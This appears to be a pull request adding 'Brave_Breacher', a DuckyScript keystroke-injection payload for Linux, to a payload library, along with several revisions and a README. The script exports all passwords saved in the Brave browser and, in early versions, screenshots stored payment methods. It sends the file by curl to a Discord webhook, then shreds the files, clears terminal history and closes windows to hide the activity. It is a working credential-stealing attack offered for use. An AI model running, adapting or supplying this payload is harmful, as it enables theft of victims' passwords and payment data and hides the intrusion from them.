### PR TITLE
Added: Brave_Breacher.

### DIFF
--- a/payloads/library/credentials/Brave_Breacher/Brave_Breacher.txt
+++ b/payloads/library/credentials/Brave_Breacher/Brave_Breacher.txt
@@ -1,0 +1,88 @@
+REM TITLE: Brave_Breacher
+REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)
+REM TARGET OS: Linux (tested on Pop!_OS) | Brave Browser Flatpak Version: 1.77.101
+REM DESCRIPTION: Brave Breacher is a side-channel attack payload that utilizes various methods to navigate the Brave Browser GUI. The payload has two phases: Phase 1, all username and password credentials stored in the browser are exported to be exfiltrated. Phase 2, the payload then navigates to the payment method settings menu and screenshots the stored payment method. The files are then moved to the /Pictures/Screenshots directory, tarballed, and then exfiltrated via Discord webhook. All files in the /Pictures/Screenshots directory are then shredded and the terminal history is cleared and all windows opened are closed to obfuscate activity. To be functional: insert USER to lines 68/78, add Discord webhook to line 76.
+
+REM Begin attack:
+ATTACKMODE HID
+DELAY 1000
+
+REM Launching Brave Browser:
+INJECT_MOD
+    GUI
+    DELAY 200
+    STRING brav
+    DELAY 100
+    ENTER
+DELAY 600
+
+REM Phase 1, Accessing password manager:
+STRINGLN brave://password-manager/passwords
+DELAY 300
+
+REM Password manager is now open.
+REM Navigating to password manager settings menu:
+REPEAT 2 TAB
+DELAY 50
+DOWN
+DELAY 50
+ENTER
+DELAY 50
+
+REM Downloading "Brave Passwords.csv" locally to home directory:
+REPEAT 4 TAB
+ENTER
+DELAY 85
+ENTER
+DELAY 300
+
+REM Phase 2, Navigating to payment method settings:
+CTRL l
+DELAY 200
+STRINGLN brave://settings/payments
+DELAY 200
+REPEAT 5 TAB
+DELAY 150
+ENTER
+DELAY 150
+ENTER
+DELAY 150
+
+REM Taking screenshot of payment method stored in browser:
+PRINTSCREEN
+DELAY 150
+STRINGLN c
+DELAY 150
+ENTER
+DELAY 150
+
+REM Closing Brave Browser:
+CTRL w
+
+REM Opening terminal window:
+DELAY 200
+CTRL ALT t
+DELAY 300
+
+REM Moving Brave password file to /Pictures/Screenshots:
+STRINGLN mv 'Brave Passwords.csv' /home/USER/Pictures/Screenshots
+
+REM Changing directory and creating tarball (loot.tar.gz) of all files in Pictures/Screenshots directory:
+STRINGLN cd Pictures/Screenshots
+	STRINGLN tar -czf loot.tar.gz *
+	DELAY 75
+
+REM Exfiltrating "loot.tar.gz" via Discord webhook:
+DEFINE WEBHOOK_URL https://discord.com/api/webhooks/PLACE/DISCORD/WEBHOOK
+    STRINGLN curl -X POST -H "Content-Type: multipart/form-data" \
+    STRINGLN -F "file=@/home/USER/Pictures/Screenshots/loot.tar.gz" \
+    STRINGLN -F "content=$ Loot Incoming $" \
+    STRINGLN WEBHOOK_URL
+ 	DELAY 100
+
+REM Shredding all files in directory Pictures/Screenshots, clearing terminal session history, and exiting terminal to obfuscate activity:
+STRINGLN shred -fuz *
+DELAY 25
+	STRINGLN history -c
+	DELAY 25
+		STRINGLN exit

--- a/payloads/library/credentials/Brave_Breacher/Brave_Breacher.txt
+++ b/payloads/library/credentials/Brave_Breacher/Brave_Breacher.txt
@@ -34,9 +34,9 @@ DELAY 50
 REM Downloading "Brave Passwords.csv" locally to home directory:
 REPEAT 4 TAB
 ENTER
-DELAY 85
+DELAY 125
 ENTER
-DELAY 300
+DELAY 400
 
 REM Closing Brave Browser:
 CTRL w

--- a/payloads/library/credentials/Brave_Breacher/Brave_Breacher.txt
+++ b/payloads/library/credentials/Brave_Breacher/Brave_Breacher.txt
@@ -1,7 +1,9 @@
 REM TITLE: Brave_Breacher
 REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)
 REM TARGET OS: Linux (tested on Pop!_OS) | Brave Browser Flatpak Version: 1.77.101
-REM DESCRIPTION: Brave Breacher is a side-channel attack payload that utilizes various methods to navigate the Brave Browser GUI. The payload has two phases: Phase 1, all username and password credentials stored in the browser are exported to be exfiltrated. Phase 2, the payload then navigates to the payment method settings menu and screenshots the stored payment method. The files are then moved to the /Pictures/Screenshots directory, tarballed, and then exfiltrated via Discord webhook. All files in the /Pictures/Screenshots directory are then shredded and the terminal history is cleared and all windows opened are closed to obfuscate activity. To be functional: insert USER to lines 68/78, add Discord webhook to line 76.
+REM DESCRIPTION: Brave Breacher is a side-channel attack payload that utilizes various methods to navigate the Brave Browser GUI. The payload exports a copy of all usernames and passwords stored in the Brave Browser Password Manager. It then exfiltrates the file via discord webhook and obfuscates its' activity by closing all opened windows, clearing the terminal history, and shredding the exported 'Brave Password.csv' file once exfiltrated. To be operable, place Discord webhook in #WEBHOOK_URL constant on line 6.
+
+DEFINE #WEBHOOK_URL https://discord.com/api/webhooks/PLACE/DISCORD/WEBHOOK
 
 REM Begin attack:
 ATTACKMODE HID
@@ -9,14 +11,14 @@ DELAY 1000
 
 REM Launching Brave Browser:
 INJECT_MOD
-    GUI
-    DELAY 200
-    STRING brav
-    DELAY 100
-    ENTER
+GUI
+DELAY 200
+STRING brav
+DELAY 100
+ENTER
 DELAY 600
 
-REM Phase 1, Accessing password manager:
+REM Accessing password manager:
 STRINGLN brave://password-manager/passwords
 DELAY 300
 
@@ -36,26 +38,6 @@ DELAY 85
 ENTER
 DELAY 300
 
-REM Phase 2, Navigating to payment method settings:
-CTRL l
-DELAY 200
-STRINGLN brave://settings/payments
-DELAY 200
-REPEAT 5 TAB
-DELAY 150
-ENTER
-DELAY 150
-ENTER
-DELAY 150
-
-REM Taking screenshot of payment method stored in browser:
-PRINTSCREEN
-DELAY 150
-STRINGLN c
-DELAY 150
-ENTER
-DELAY 150
-
 REM Closing Brave Browser:
 CTRL w
 
@@ -64,25 +46,16 @@ DELAY 200
 CTRL ALT t
 DELAY 300
 
-REM Moving Brave password file to /Pictures/Screenshots:
-STRINGLN mv 'Brave Passwords.csv' /home/USER/Pictures/Screenshots
+REM Exfiltrating "Brave Passowrds.csv" via Discord webhook:
+STRINGLN curl -X POST -H "Content-Type: multipart/form-data" \
+STRINGLN -F "file=@/home/$USER/Brave Passwords.csv" \
+STRINGLN -F "content=$ Loot Incoming $" \
+STRINGLN #WEBHOOK_URL
+DELAY 100
 
-REM Changing directory and creating tarball (loot.tar.gz) of all files in Pictures/Screenshots directory:
-STRINGLN cd Pictures/Screenshots
-	STRINGLN tar -czf loot.tar.gz *
-	DELAY 75
-
-REM Exfiltrating "loot.tar.gz" via Discord webhook:
-DEFINE WEBHOOK_URL https://discord.com/api/webhooks/PLACE/DISCORD/WEBHOOK
-    STRINGLN curl -X POST -H "Content-Type: multipart/form-data" \
-    STRINGLN -F "file=@/home/USER/Pictures/Screenshots/loot.tar.gz" \
-    STRINGLN -F "content=$ Loot Incoming $" \
-    STRINGLN WEBHOOK_URL
- 	DELAY 100
-
-REM Shredding all files in directory Pictures/Screenshots, clearing terminal session history, and exiting terminal to obfuscate activity:
-STRINGLN shred -fuz *
+REM Shredding 'Brave Passwords.csv', clearing terminal session history, and exiting terminal to obfuscate activity:
+STRINGLN shred -fuz 'Brave Passwords.csv'
 DELAY 25
-	STRINGLN history -c
-	DELAY 25
-		STRINGLN exit
+STRINGLN history -c
+DELAY 25
+STRINGLN exit

--- a/payloads/library/credentials/Brave_Breacher/README.md
+++ b/payloads/library/credentials/Brave_Breacher/README.md
@@ -1,0 +1,21 @@
+REM TITLE: Brave_Breacher
+
+REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)
+
+REM TARGET OS: Linux (tested on Pop!_OS) | Brave Browser Flatpak Version: 1.77.101
+
+REM DESCRIPTION: Brave Breacher is a side-channel attack payload that utilizes various methods to navigate the Brave Browser GUI. The payload has two phases: Phase 1, all username and password credentials stored in the browser are exported to be exfiltrated. Phase 2, the payload then navigates to the payment method settings menu and screenshots the stored payment method. The files are then moved to the /Pictures/Screenshots directory, tarballed, and then exfiltrated via Discord webhook. All files in the /Pictures/Screenshots directory are then shredded and the terminal history is cleared and all windows opened are closed to obfuscate activity. To be functional: insert USER to lines 68/78, add Discord webhook to line 76.
+
+![bbdemo](https://github.com/user-attachments/assets/1c0776ed-2c0f-477f-94ea-87ab4fd95066)
+
+![loot](https://github.com/user-attachments/assets/203efd4a-0e53-48a9-9f6b-3d8bc35bd2bf)
+
+![loott](https://github.com/user-attachments/assets/4bffc3b8-466e-46ca-a6a8-4ea988342cd4)
+
+```
+name,url,username,password,note
+site1.com,https://site1.com/,user1,pass1,
+site2.com,https://site2.com/,user2,pass2,
+site3.com,https://site3.com/,user3,pass3,
+site4.com,https://site4.com/,site4,pass4,
+```

--- a/payloads/library/credentials/Brave_Breacher/README.md
+++ b/payloads/library/credentials/Brave_Breacher/README.md
@@ -8,10 +8,6 @@ REM DESCRIPTION: Brave Breacher is a side-channel attack payload that utilizes v
 
 ![bbdemo](https://github.com/user-attachments/assets/1c0776ed-2c0f-477f-94ea-87ab4fd95066)
 
-![loot](https://github.com/user-attachments/assets/203efd4a-0e53-48a9-9f6b-3d8bc35bd2bf)
-
-![loott](https://github.com/user-attachments/assets/4bffc3b8-466e-46ca-a6a8-4ea988342cd4)
-
 ```
 name,url,username,password,note
 site1.com,https://site1.com/,user1,pass1,

--- a/payloads/library/credentials/Brave_Breacher/README.md
+++ b/payloads/library/credentials/Brave_Breacher/README.md
@@ -6,8 +6,7 @@ REM TARGET OS: Linux (tested on Pop!_OS) | Brave Browser Flatpak Version: 1.77.1
 
 REM DESCRIPTION: Brave Breacher is a side-channel attack payload that utilizes various methods to navigate the Brave Browser GUI. The payload exports a copy of all usernames and passwords stored in the Brave Browser Password Manager. It then exfiltrates the file via discord webhook and obfuscates its' activity by closing all opened windows, clearing the terminal history, and shredding the exported 'Brave Password.csv' file once exfiltrated. To be operable, place Discord webhook in #WEBHOOK_URL constant on line 6.
 
-![bbdemo](https://github.com/user-attachments/assets/1c0776ed-2c0f-477f-94ea-87ab4fd95066)
-
+**Exfiltrated password manager file:**
 ```
 name,url,username,password,note
 site1.com,https://site1.com/,user1,pass1,

--- a/payloads/library/credentials/Brave_Breacher/README.md
+++ b/payloads/library/credentials/Brave_Breacher/README.md
@@ -4,7 +4,7 @@ REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)
 
 REM TARGET OS: Linux (tested on Pop!_OS) | Brave Browser Flatpak Version: 1.77.101
 
-REM DESCRIPTION: Brave Breacher is a side-channel attack payload that utilizes various methods to navigate the Brave Browser GUI. The payload has two phases: Phase 1, all username and password credentials stored in the browser are exported to be exfiltrated. Phase 2, the payload then navigates to the payment method settings menu and screenshots the stored payment method. The files are then moved to the /Pictures/Screenshots directory, tarballed, and then exfiltrated via Discord webhook. All files in the /Pictures/Screenshots directory are then shredded, the terminal history is cleared, and all windows opened are closed to obfuscate activity. To be functional: insert USER to lines 68/78, add Discord webhook to line 76.
+REM DESCRIPTION: Brave Breacher is a side-channel attack payload that utilizes various methods to navigate the Brave Browser GUI. The payload exports a copy of all usernames and passwords stored in the Brave Browser Password Manager. It then exfiltrates the file via discord webhook and obfuscates its' activity by closing all opened windows, clearing the terminal history, and shredding the exported 'Brave Password.csv' file once exfiltrated. To be operable, place Discord webhook in #WEBHOOK_URL constant on line 6.
 
 ![bbdemo](https://github.com/user-attachments/assets/1c0776ed-2c0f-477f-94ea-87ab4fd95066)
 

--- a/payloads/library/credentials/Brave_Breacher/README.md
+++ b/payloads/library/credentials/Brave_Breacher/README.md
@@ -4,7 +4,7 @@ REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)
 
 REM TARGET OS: Linux (tested on Pop!_OS) | Brave Browser Flatpak Version: 1.77.101
 
-REM DESCRIPTION: Brave Breacher is a side-channel attack payload that utilizes various methods to navigate the Brave Browser GUI. The payload has two phases: Phase 1, all username and password credentials stored in the browser are exported to be exfiltrated. Phase 2, the payload then navigates to the payment method settings menu and screenshots the stored payment method. The files are then moved to the /Pictures/Screenshots directory, tarballed, and then exfiltrated via Discord webhook. All files in the /Pictures/Screenshots directory are then shredded and the terminal history is cleared and all windows opened are closed to obfuscate activity. To be functional: insert USER to lines 68/78, add Discord webhook to line 76.
+REM DESCRIPTION: Brave Breacher is a side-channel attack payload that utilizes various methods to navigate the Brave Browser GUI. The payload has two phases: Phase 1, all username and password credentials stored in the browser are exported to be exfiltrated. Phase 2, the payload then navigates to the payment method settings menu and screenshots the stored payment method. The files are then moved to the /Pictures/Screenshots directory, tarballed, and then exfiltrated via Discord webhook. All files in the /Pictures/Screenshots directory are then shredded, the terminal history is cleared, and all windows opened are closed to obfuscate activity. To be functional: insert USER to lines 68/78, add Discord webhook to line 76.
 
 ![bbdemo](https://github.com/user-attachments/assets/1c0776ed-2c0f-477f-94ea-87ab4fd95066)
 


### PR DESCRIPTION
Brave Breacher is a side-channel attack payload that utilizes various methods to navigate the Brave Browser GUI (Linux). The payload has two phases: Phase 1, all username and password credentials stored in the browser are exported to be exfiltrated. Phase 2, the payload then navigates to the payment method settings menu and screenshots the stored payment method. The files are then moved to the /Pictures/Screenshots directory, tarballed, and then exfiltrated via Discord webhook. All files in the /Pictures/Screenshots directory are then shredded, the terminal history is cleared and all windows opened are closed to obfuscate activity.